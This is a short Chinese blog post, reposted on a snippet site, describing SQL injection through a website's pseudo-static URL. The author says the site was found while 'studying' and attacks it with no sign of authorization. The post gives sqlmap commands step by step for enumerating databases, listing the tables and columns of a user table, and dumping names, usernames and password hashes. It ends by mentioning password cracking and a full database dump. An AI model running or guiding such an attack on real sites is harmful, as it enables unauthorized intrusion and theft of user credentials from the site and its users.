首页 > 代码库 > 伪静态注入
伪静态注入
今天在学习的过程中发现了一个网站的伪静态含有注入,便对此进行了渗透
利用工具:sqlmap
我在”/id/12.html“上的12后面加上*,然后放在sqlmap上爆
先查看当前的数据库,命令为sqlmap.py -u url --current-db,查看的数据库为下图
1:查看这个数据库里面的表,指定数据库命令为python sqlmap/sqlmap.py -u "http://www.***.com/en/?product/id/12*.html" -D ingenic_en --tables
2:找出表中含有的字段,命令为python sqlmap/sqlmap.py -u "http://www.***.com/en/?product/id/12*.html" -D ingenic_en -T mx_user --columns
3:爆这些字段的内容:name,password,username,命令为python sqlmap/sqlmap.py -u "http://www.***.com/en/?product/id/12*.html" -D ingenic_en -T mx_user -C name,password,username --dump
如上所示,爆出了字段的内容,获得了用户名和密码,密码是需要解密的,最后是拖库
本文出自 “costin” 博客,请务必保留此出处http://brighttime.blog.51cto.com/12837169/1918427
伪静态注入
声明:以上内容来自用户投稿及互联网公开渠道收集整理发布,本网站不拥有所有权,未作人工编辑处理,也不承担相关法律责任,若内容有误或涉及侵权可进行投诉: 投诉/举报 工作人员会在5个工作日内联系你,一经查实,本站将立刻删除涉嫌侵权内容。